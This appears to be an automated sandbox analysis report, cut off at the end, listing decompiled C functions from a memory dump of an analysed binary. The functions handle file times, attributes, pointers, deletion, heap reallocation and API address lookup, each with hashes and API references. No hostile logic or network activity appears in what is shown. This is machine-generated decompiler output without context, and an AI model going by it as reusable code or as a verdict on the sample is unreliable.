                                                                                                                • Instruction ID: bed74bc0ff513258eb66bb708020befcb063e6b639950628bd6d0c0f11f6dbd3
                                                                                                                • Opcode Fuzzy Hash: 1a9d7add333f5cedcdb21f0c85ddf4238865252563033bf490b63600f2ea03eb
                                                                                                                • Instruction Fuzzy Hash: DB2128B0004348AED3348F24C945FE7B7E8EB46368F00495DF4E5A22D2C275AD4A9A60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC2162, Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00EC2162(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00EC702C(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00EC702C(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00EC702C(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}
















                                                                                                                0x00ec2162
                                                                                                                0x00ec2168
                                                                                                                0x00ec2171
                                                                                                                0x00ec217c
                                                                                                                0x00ec217c
                                                                                                                0x00ec2182
                                                                                                                0x00ec2188
                                                                                                                0x00ec218b
                                                                                                                0x00ec2198
                                                                                                                0x00ec2194
                                                                                                                0x00ec2194
                                                                                                                0x00ec2194
                                                                                                                0x00ec219a
                                                                                                                0x00ec219b
                                                                                                                0x00ec219f
                                                                                                                0x00ec21a5
                                                                                                                0x00ec21b2
                                                                                                                0x00ec21b2
                                                                                                                0x00ec21a7
                                                                                                                0x00ec21ac
                                                                                                                0x00ec21b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec21b0
                                                                                                                0x00ec21b7
                                                                                                                0x00ec21bd
                                                                                                                0x00ec21c7
                                                                                                                0x00ec21c7
                                                                                                                0x00ec21cb
                                                                                                                0x00ec21d2
                                                                                                                0x00ec21d2
                                                                                                                0x00ec21dc
                                                                                                                0x00ec21e5
                                                                                                                0x00ec21e5
                                                                                                                0x00ec21ed
                                                                                                                0x00ec21f6
                                                                                                                0x00ec21f6
                                                                                                                0x00ec2206
                                                                                                                0x00ec2214
                                                                                                                0x00ec2224
                                                                                                                0x00ec222c
                                                                                                                0x00ec2238

                                                                                                                APIs
                                                                                                                • FlushFileBuffers.KERNEL32(?), ref: 00EC217C
                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00EC222C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: File$BuffersFlushTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 1392018926-0
                                                                                                                • Opcode ID: 1e42530e7ac53eb2a957e71aaa103145718158977f9502743f52c3ebe1112502
                                                                                                                • Instruction ID: 81e63e6dc28c07a39c93b3bf94ad2b2bcdc3ccfc29be77581796f0d125bd7761
                                                                                                                • Opcode Fuzzy Hash: 1e42530e7ac53eb2a957e71aaa103145718158977f9502743f52c3ebe1112502
                                                                                                                • Instruction Fuzzy Hash: 5B21D6361492469FC715DE25CA91FABBBE4AF55308F08181CFAC1E7141C32ADE4ED7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDF528, Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00EDF528(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xf25c98 + _a4 * 4;
				_t27 =  *0xef1558; // 0xf529bb33
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xef1558; // 0xf529bb33
							goto L13;
						}
						 *_t20 = E00ED33D1(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00EDF5C4( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xef1558; // 0xf529bb33
						goto L7;
					}
					_t27 =  *0xef1558; // 0xf529bb33
					goto L8;
				}
				L2:
				return _t33;
			}










                                                                                                                0x00edf533
                                                                                                                0x00edf53c
                                                                                                                0x00edf542
                                                                                                                0x00edf54c
                                                                                                                0x00edf54e
                                                                                                                0x00edf552
                                                                                                                0x00edf5bd
                                                                                                                0x00000000
                                                                                                                0x00edf5bd
                                                                                                                0x00edf556
                                                                                                                0x00edf55c
                                                                                                                0x00edf562
                                                                                                                0x00edf57e
                                                                                                                0x00edf57e
                                                                                                                0x00edf580
                                                                                                                0x00edf582
                                                                                                                0x00edf5ad
                                                                                                                0x00edf5af
                                                                                                                0x00edf5b7
                                                                                                                0x00edf5bb
                                                                                                                0x00000000
                                                                                                                0x00edf5bb
                                                                                                                0x00edf58e
                                                                                                                0x00edf592
                                                                                                                0x00edf5a7
                                                                                                                0x00000000
                                                                                                                0x00edf5a7
                                                                                                                0x00edf59b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf564
                                                                                                                0x00edf564
                                                                                                                0x00edf566
                                                                                                                0x00edf56e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf570
                                                                                                                0x00edf576
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edf578
                                                                                                                0x00000000
                                                                                                                0x00edf578
                                                                                                                0x00edf59f
                                                                                                                0x00000000
                                                                                                                0x00edf59f
                                                                                                                0x00edf558
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00EDF588
                                                                                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EDF595
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2279764990-0
                                                                                                                • Opcode ID: 40306a2e17dbb313215cee7c12dd3755647f7af422b9d63f46f03e01678f1437
                                                                                                                • Instruction ID: 36ae9a632f34582067bcf95d84b0cb75051c2ae6ac87829b1e0bf5c29a1fe8d3
                                                                                                                • Opcode Fuzzy Hash: 40306a2e17dbb313215cee7c12dd3755647f7af422b9d63f46f03e01678f1437
                                                                                                                • Instruction Fuzzy Hash: 0711C133A002699F9B21DE2EFC409AA7395EBC43287165272F81ABF344D630ED4386D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1FAD, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 69%
                                                                                                                			E00EC1FAD(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E00EC1D95(_t28);
						} else {
							 *0xee7220(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}














                                                                                                                0x00ec1fad
                                                                                                                0x00ec1faf
                                                                                                                0x00ec1fb5
                                                                                                                0x00ec202f
                                                                                                                0x00000000
                                                                                                                0x00ec202f
                                                                                                                0x00ec1fb8
                                                                                                                0x00ec1fbd
                                                                                                                0x00ec1fc1
                                                                                                                0x00ec1fc3
                                                                                                                0x00ec1ffd
                                                                                                                0x00ec1fcb
                                                                                                                0x00ec1fcb
                                                                                                                0x00ec1fd1
                                                                                                                0x00ec1fd6
                                                                                                                0x00ec1ff0
                                                                                                                0x00ec1fd8
                                                                                                                0x00ec1fe1
                                                                                                                0x00ec1fe9
                                                                                                                0x00ec1feb
                                                                                                                0x00ec1ff5
                                                                                                                0x00ec1ff7
                                                                                                                0x00ec1ff9
                                                                                                                0x00ec1ff9
                                                                                                                0x00ec1fd1
                                                                                                                0x00ec2003
                                                                                                                0x00ec2014
                                                                                                                0x00ec201f
                                                                                                                0x00000000
                                                                                                                0x00ec202b
                                                                                                                0x00000000
                                                                                                                0x00ec202b

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00EC2014
                                                                                                                • GetLastError.KERNEL32 ref: 00EC2021
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 0f30c4a9239f376b72ec56a57a7977f96f8a14beca2da94ec7b2e862591f555e
                                                                                                                • Instruction ID: b862a3e5b5bb3250bb50c0c406ba69bff3509712a1112f727e4cf3be1f3a78d9
                                                                                                                • Opcode Fuzzy Hash: 0f30c4a9239f376b72ec56a57a7977f96f8a14beca2da94ec7b2e862591f555e
                                                                                                                • Instruction Fuzzy Hash: 3F0108313042849F8714CE299A85E7EB399AF85321B10512FFA27AB293CB72DC06C620
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC2240, Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E00EC2240() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
				_t22 = _t21 | 0xffffffff;
				if( *(_t34 + 4) != _t22) {
					L3:
					_v4 = _v4 & 0x00000000;
					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
					_t32 = _t12;
					if(_t32 != _t22 || GetLastError() == 0) {
						L7:
						asm("cdq");
						_t14 = 0 + _t32;
						asm("adc edx, 0x0");
						goto L8;
					} else {
						if( *((char*)(_t34 + 0x14)) == 0) {
							_t14 = _t22;
							L8:
							return _t14;
						}
						E00EC197C(0xf10b74, 0xf10b74, _t34 + 0x1e);
						goto L7;
					}
				}
				if( *((char*)(_t34 + 0x14)) == 0) {
					return _t22;
				}
				E00EC197C(0xf10b74, 0xf10b74, _t34 + 0x1e);
				goto L3;
			}













                                                                                                                0x00ec2244
                                                                                                                0x00ec2246
                                                                                                                0x00ec2251
                                                                                                                0x00ec2264
                                                                                                                0x00ec2264
                                                                                                                0x00ec2276
                                                                                                                0x00ec227c
                                                                                                                0x00ec2280
                                                                                                                0x00ec229d
                                                                                                                0x00ec22a3
                                                                                                                0x00ec22a8
                                                                                                                0x00ec22aa
                                                                                                                0x00000000
                                                                                                                0x00ec228c
                                                                                                                0x00ec2290
                                                                                                                0x00ec22b9
                                                                                                                0x00ec22ad
                                                                                                                0x00000000
                                                                                                                0x00ec22ad
                                                                                                                0x00ec2298
                                                                                                                0x00000000
                                                                                                                0x00ec2298
                                                                                                                0x00ec2280
                                                                                                                0x00ec2257
                                                                                                                0x00000000
                                                                                                                0x00ec22b5
                                                                                                                0x00ec225f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00EC2276
                                                                                                                • GetLastError.KERNEL32 ref: 00EC2282
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 230a2545e9ec81c75ee503431f95913fe3f76346bb720b4e650928bb69d6419f
                                                                                                                • Instruction ID: aade70e3c9428f3f0a2ba3e93ffed80d145c865350b037bb0a56e072a7db77c6
                                                                                                                • Opcode Fuzzy Hash: 230a2545e9ec81c75ee503431f95913fe3f76346bb720b4e650928bb69d6419f
                                                                                                                • Instruction Fuzzy Hash: 2D01B5757043046FD738AE29DD84F6BB7D99B85329F14463DB242D76A0CA72DC0EC611
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDEF97, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E00EDEF97(void* __ebx, void* __ecx, void* _a4, long _a8) {
				void* __edi;
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t10;
				void* _t14;
				long _t16;

				_t11 = __ecx;
				_t10 = __ebx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0xf25d54, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00EDD424();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00EDD0D0(_t10, _t11, _t14, _t16, __eflags, _t16);
								_pop(_t11);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00EDD9BD())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00EDD5AA(_t14);
					goto L6;
				}
				_t9 = E00EDD5E4(__ecx, _a8); // executed
				return _t9;
			}











                                                                                                                0x00edef97
                                                                                                                0x00edef97
                                                                                                                0x00edef9d
                                                                                                                0x00edefa2
                                                                                                                0x00edefb0
                                                                                                                0x00edefb3
                                                                                                                0x00edefb5
                                                                                                                0x00edefc0
                                                                                                                0x00edefc3
                                                                                                                0x00edefea
                                                                                                                0x00edeff4
                                                                                                                0x00edeffa
                                                                                                                0x00edeffc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edefdb
                                                                                                                0x00edefdd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edefe0
                                                                                                                0x00edefe5
                                                                                                                0x00edefe6
                                                                                                                0x00edefe8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edefe8
                                                                                                                0x00edefd2
                                                                                                                0x00000000
                                                                                                                0x00edefd2
                                                                                                                0x00edefc5
                                                                                                                0x00edefca
                                                                                                                0x00edefd0
                                                                                                                0x00edefd0
                                                                                                                0x00edefd0
                                                                                                                0x00000000
                                                                                                                0x00edefd0
                                                                                                                0x00edefb8
                                                                                                                0x00000000
                                                                                                                0x00edefbd
                                                                                                                0x00edefa7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00EDEFB8
                                                                                                                  • Part of subcall function 00EDD5E4: RtlAllocateHeap.NTDLL(00000000,?,?,?,00ED8A0E,?,0000015D,?,?,?,?,00ED9EEA,000000FF,00000000,?,?), ref: 00EDD616
                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F10B74,00EC3AAF,?,?,?,?,?,?), ref: 00EDEFF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocAllocate_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2447670028-0
                                                                                                                • Opcode ID: 8f5860a0c8f13bb112b7948ad28d54b0ad046eee5268c9216bf7aff9ea0b120e
                                                                                                                • Instruction ID: f8c08c38f63c0b360b6d0036b68a0c2dd3b3b9c2381cc871a4584759a282414e
                                                                                                                • Opcode Fuzzy Hash: 8f5860a0c8f13bb112b7948ad28d54b0ad046eee5268c9216bf7aff9ea0b120e
                                                                                                                • Instruction Fuzzy Hash: 37F0683230951566D7213725AC4DB9F3B99DFC1764F263027F8147E395DA31D8039191
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC27F3, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00EC27F3(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00ED3370();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00EC3399(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                                                                                                                0x00ec27fb
                                                                                                                0x00ec2800
                                                                                                                0x00ec2807
                                                                                                                0x00ec280f
                                                                                                                0x00ec2814
                                                                                                                0x00ec2840
                                                                                                                0x00ec2840
                                                                                                                0x00ec2849

                                                                                                                APIs
                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000,?,?,00EC2629,?,?), ref: 00EC2807
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,?,00EC2629,?,?), ref: 00EC2838
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: cb154a17882bb0c524f08871d0af499eea6b8ad48ec49b47580aa8491fe8f7e3
                                                                                                                • Instruction ID: 322dd55593bc364a8f62cf8edefea865c57bbd36ddbee38998fcd58ab6c3abae
                                                                                                                • Opcode Fuzzy Hash: cb154a17882bb0c524f08871d0af499eea6b8ad48ec49b47580aa8491fe8f7e3
                                                                                                                • Instruction Fuzzy Hash: 7AF0A03114020DBBDF019F60DD40FE937ACAB04381F048069BD88A6160DB328A99AAA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC24CD, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00EC24CD(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00ED3370();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00EC3399(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                                                                                                                0x00ec24d5
                                                                                                                0x00ec24da
                                                                                                                0x00ec24de
                                                                                                                0x00ec24e6
                                                                                                                0x00ec24eb
                                                                                                                0x00ec2514
                                                                                                                0x00ec2514
                                                                                                                0x00ec251d

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00EC1CFC,?,?,00EC1B37), ref: 00EC24DE
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00EC1CFC,?,?,00EC1B37), ref: 00EC250C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: f11aff74c0ca61c2559662dc5c9e5ab2dac821691b35ade584410dee6661bdeb
                                                                                                                • Instruction ID: 1bd04229e184654426a39778af266dabfd5396b24e453520f68bdb3ccdeee881
                                                                                                                • Opcode Fuzzy Hash: f11aff74c0ca61c2559662dc5c9e5ab2dac821691b35ade584410dee6661bdeb
                                                                                                                • Instruction Fuzzy Hash: 50E0227018020CAFDB009F34EC00FEA339CBB08381F4490A9B984F7050EF228ED5AA50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC2534, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC2534(WCHAR* _a4) {
				short _v4100;
				long _t6;
				void* _t9;
				long _t11;
				long _t13;

				E00ED3370();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff) {
					_t9 = E00EC3399(_a4,  &_v4100, 0x800); // executed
					if(_t9 != 0) {
						_t11 = GetFileAttributesW( &_v4100); // executed
						_t13 = _t11;
					}
				}
				return _t13;
			}








                                                                                                                0x00ec253c
                                                                                                                0x00ec2545
                                                                                                                0x00ec254b
                                                                                                                0x00ec2550
                                                                                                                0x00ec2561
                                                                                                                0x00ec2568
                                                                                                                0x00ec2571
                                                                                                                0x00ec2577
                                                                                                                0x00ec2577
                                                                                                                0x00ec2568
                                                                                                                0x00ec257f

                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 00EC2545
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800), ref: 00EC2571
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: df517fb4d316053de6b20093a683134f797b8b2020e68f095f7eee4e9553675d
